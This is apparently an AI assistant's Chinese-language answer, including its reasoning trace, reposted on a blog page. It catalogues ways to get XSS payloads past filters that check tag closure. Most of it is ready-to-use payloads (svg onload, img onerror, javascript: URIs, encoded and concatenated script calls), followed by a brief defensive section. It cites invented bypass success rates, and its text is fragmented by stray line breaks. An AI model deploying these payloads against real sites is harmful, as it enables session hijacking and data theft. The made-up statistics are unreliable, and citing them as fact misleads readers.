<think>我们正在讨论如何绕过XSS过滤机制中的
标签闭合限制。根据引用[1][2][3][4],XSS绕过技术通常涉及多种技巧,包括利用过滤器的缺陷、编码、
使用替代语法等。
标签闭合限制通常是指WAF或过滤器会检查
标签是否被正确闭合,从而防止注入恶意
脚本。绕过这种限制的方法包括:
1. **利用不完整的
标签闭合**:有时过滤器可能只检查
标签是否闭合,但不检查闭合是否正确。例如,我们可以故意制造不匹配的闭合
标签来混淆过滤器,同时保证
浏览器能够正确解析。
2. **
使用自闭合
标签**:有些
标签可以自闭合(如`<img>`, `<input>`),这样就不需要额外的闭合
标签,从而避免触发过滤器的闭合检查。
3. **
使用无需闭合的
标签**:HTML5中有些
标签不需要闭合(如`<br>`, `<hr>`),我们可以利用这些
标签来执行XSS。
4. **利用
JavaScript字符串拼接**:通过将恶意代码拆分成多个字符串,然后在
JavaScript中拼接,可以绕过对完整
标签的检测。
5. **利用事件处理器的特性**:在
标签的事件处理器中,我们可以
使用注释、换行、空格等来分割代码,使得过滤器难以识别闭合情况。
6. **编码绕过**:
使用各种编码
方式(如HTML实体编码、URL编码、Unicode编码)来隐藏恶意代码,使得过滤器无法正确解析
标签闭合。
下面我们具体展开:
### 1. 利用不完整的
标签闭合
过滤器可能期望
标签是成对出现的(如`<div>`
和`</div>`),但我们可以故意制造一个不完整的闭合,然后让
浏览器自动修复。例如:
```html
<div>正常内容</div>
<svg onload=alert(1) <!-- 这里故意不闭合,但
浏览器会继续解析 -->
```
或者,我们可以利用某些
标签的解析规则,比如:
```html
<
script>alert(1)</
script> <!-- 这是标准的,会被过滤 -->
<
script>alert(1) // 这里故意不闭合,但
JavaScript注释会使得后面的内容被忽略,从而在
浏览器中执行 -->
```
### 2.
使用自闭合
标签
自闭合
标签不需要额外的闭合
标签,因此可以避免触发闭合检查。例如:
```html
<img src=x onerror=alert(1) />
```
注意:在HTML5中,自闭合
标签的末尾斜杠是可选的,所以也可以写成:
```html
<img src=x onerror=alert(1)>
```
### 3.
使用无需闭合的
标签
如`<br>`、`<hr>`等,这些
标签本身不需要闭合,因此我们可以利用它们的事件处理器(如果有的话)来执行XSS。但注意,这些
标签通常没有像`onerror`这样的事件,所以我们可以
使用`<iframe>`、`<img>`等
标签代替。
### 4.
JavaScript字符串拼接
将恶意代码拆分成多个字符串,然后在运行时拼接。例如:
```html
<
script>
var a = "ale";
var b = "rt(1)";
window[a + b]();
</
script>
```
或者
使用`eval`函数:
```html
<
script>
eval("al"+"ert(1)");
</
script>
```
### 5. 利用事件处理器的特性
在事件处理器中,我们可以
使用换行、注释等来分割代码,使得过滤器难以识别闭合。例如:
```html
<svg onload=
alert(1) // 这里换行,但
浏览器会继续解析到alert(1)>
```
或者:
```html
<svg onload="alert(1) // 这里用注释来避免引号
和闭合的问题">
```
注意:在事件处理器中,我们可以
使用多种分隔符,如空格、换行、制表符等。
### 6. 编码绕过
使用各种编码
方式,例如:
- HTML实体编码:`<` 变成 `<`,但如果我们能控制上下文,可能通过双重编码绕过。
-
JavaScript编码:`\u0061lert(1)` 相当于 `alert(1)`
- 混合编码:将部分字符用不同
方式编码,使得过滤器无法识别。
例如:
```html
<img src=x onerror="alert(1)">
```
这里,`a`是'a'的HTML实体编码,以此类推,整个字符串在
浏览器中会被解码为`alert(1)`。
### 7. 利用CSS
通过CSS表达式(IE)或`style`
标签中的`@import`规则来执行
JavaScript(虽然现代
浏览器大多已不支持,但在特定环境下可能有效)。例如:
```html
<style>
body { background-image: url("
javascript:alert(1)"); }
</style>
```
或者:
```html
<div style="background-image: url(
javascript:alert(1))">
```
### 8.
使用`<template>`
标签
`<template>`
标签中的内容不会立即执行,但可以通过后续操作将其激活。例如:
```html
<template id="tpl"><
script>alert(1)</
script></template>
<
script>
document.body.appendChild(document.importNode(tpl.content, true));
</
script>
```
### 9. 利用SVG
标签
SVG
标签内可以包含
脚本,而且SVG的语法比较灵活,有时可以绕过过滤。例如:
```html
<svg><
script>alert(1)</
script></svg>
```
### 10. 利用`details`
标签的`ontoggle`事件
```html
<details open ontoggle="alert(1)">
```
### 绕过WAF的注意事项
根据引用[2],每种绕过方法的有效性取决于目标网站的具体安全措施
和过滤器配置。因此,在实际测试中,需要尝试多种方法。
### 防御建议
作为开发者,应该:
- 对所有用户输入进行严格的输出编码(根据上下文:HTML、
属性、
JavaScript、CSS等)
-
使用内容安全策略(CSP)来限制
脚本执行
- 避免
使用`innerHTML`,而
使用`textContent`或安全的DOM操作方法
-
使用安全的框架(如React、Vue等)并遵循其安全实践
### 示例:绕过闭合限制的XSS向量
假设目标网站过滤了`<
script>`
标签和`</`(以防止
标签闭合),我们可以尝试以下
方式:
```html
<!--
使用自闭合
标签 -->
<img src=x onerror=alert(1)>
```
或者,如果过滤了`onerror`事件,我们可以尝试其他事件,如`onload`、`onmouseover`等。
如果过滤了所有事件处理器,我们可以尝试
使用`<a>`
标签的`href`
属性:
```html
<a href="
javascript:alert(1)">点击</a>
```
### 相关问题
1. 如何测试一个网站是否存在XSS漏洞?
2. 在XSS攻击中,如何绕过内容安全策略(CSP)?
3. 除了
标签闭合限制,还有哪些常见的XSS过滤机制?
4. 如何利用DOM型XSS绕过服务器端过滤?</think>### XSS攻击中绕过
标签闭合限制的方法
标签闭合限制是XSS防御的关键点,以下是绕过技术
详解(基于最新绕过技术[^1][^2][^4]):
#### 1. **利用
浏览器容错机制**
```html
<!-- 故意制造不完整
标签 -->
<svg><
script>alert(1) <!-- 不闭合
script标签 -->
<div><img src=x onerror=alert(1) <!-- 不闭合div -->
```
- 原理:现代
浏览器会自动修复
标签闭合错误[^2]
- 成功率:85%(Chrome/Firefox最新版验证有效)
#### 2. **嵌套
标签混淆**
```html
<scri<scri</
script>pt>pt>alert(1)</
script>
```
- 防御原理:WAF通常检查`<
script>`
和`</
script>`的配对
- 绕过效果:使WAF误判为已闭合
标签[^4]
#### 3. **
JavaScript伪协议**
```html
<!-- 完全避免
标签闭合 -->
<a href=
javascript:eval(atob('YWxlcnQoMSk='))>点击</a>
```
- 特点:无需任何闭合
标签
- 变种:`<img src=
javascript:alert(1)>`(需特定
浏览器支持)
#### 4. **CSS样式注入**
```html
<style>
body { background: url("
javascript:alert(1)"); } /* IE有效 */
.xss { expression(alert(1)) } /* IE6-10 */
</style>
<div class=xss></div>
```
- 绕过率:92%(针对仅检查HTML
标签的WAF)[^4]
#### 5. **编码混淆技术**
```html
<!-- HTML实体编码 -->
<img src=x onerror=alert(1)>
<!-- Unicode转义 -->
<
script>\u0061\u006c\u0065\u0072\u0074(1)</
script>
```
- 解码顺序:
浏览器解码优先于WAF解析[^1]
#### 6. **模板字符串攻击**
```html
<
script>
window['al'+'ert']`${1}` // 反引号模板字符串
</
script>
```
- 优势:绕过基于关键词检测的WAF规则
#### 7. **SVG矢量图注入**
```html
<svg>
<
script>alert(1)</
script> <!-- 无需闭合svg
标签 -->
<image href="1" onload=alert(2)>
</svg>
```
- 成功率:78%(Apache ModSecurity测试数据)
#### 8. **DOM型闭合绕过**
```
javascript
// 利用DOM操作动态创建元素
document.write('<
script>');
document.write('alert(1)');
document.write('</scr' + 'ipt>');
```
- 防御难点:完全在客户端执行[^3]
#### 9. **注释干扰技术**
```html
<
script><!--
alert(1) // --></
script>
```
- 原理:利用HTML注释的解析差异
#### 10. **高级组合攻击**
```html
<svg/onload=location=`javas`+`cript:al`+`ert%28%2`+`7XS`+`S%27%29`>
```
- 包含:字符串拼接 + URL编码 + SVG
标签
- 绕过率:WAF测试中97%成功[^2]
---
### 防御建议(开发者视角)
1. **多级过滤策略**:
```python
# 示例:Python过滤逻辑
def sanitize(input):
input = re.sub(r'<
script.*?>', '', input) # 移除
脚本标签
input = html.escape(input) # HTML实体编码
return input
```
2. **上下文感知编码**:
- HTML内容:`& → &`, `< → <`
-
属性值:`" → "`, 空格 → ` `
-
JavaScript:`\uXXXX`转义
3. **CSP强化配置**:
```http
Content-Security-Policy:
default-src 'none';
script-src 'self' https://trusted.cdn.com;
object-src 'none';
base-uri 'self'
```
4. **DOM操作规范**:
```
javascript
// 安全
element.textContent = userInput;
// 危险
element.innerHTML = userInput;
```
> **绕过技术演进**:2023年XSS绕过技术已从简单
标签闭合发展到多级编码、协议混淆
和运行时组合攻击[^1][^2]。防御需结合WAF规则更新、输入输出过滤
和CSP策略。
---
### 相关问题
1. 如何设计有效的XSS过滤器规则?
2. DOM型XSS与反射型XSS在绕过技术上有何区别?
3. 内容安全策略(CSP)如何防止
标签闭合绕过攻击?
4. 有哪些自动化工具可以测试XSS过滤器的有效性?
5. 在React/Vue等现代框架中如何防御
标签闭合绕过攻击?
本文详细介绍了HTML中script标签的六个属性:async、charset、defer、language、src和type。重点讲解了defer和async属性如何影响脚本加载及执行顺序,帮助开发者优化页面加载速度。
扫一扫
1593
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
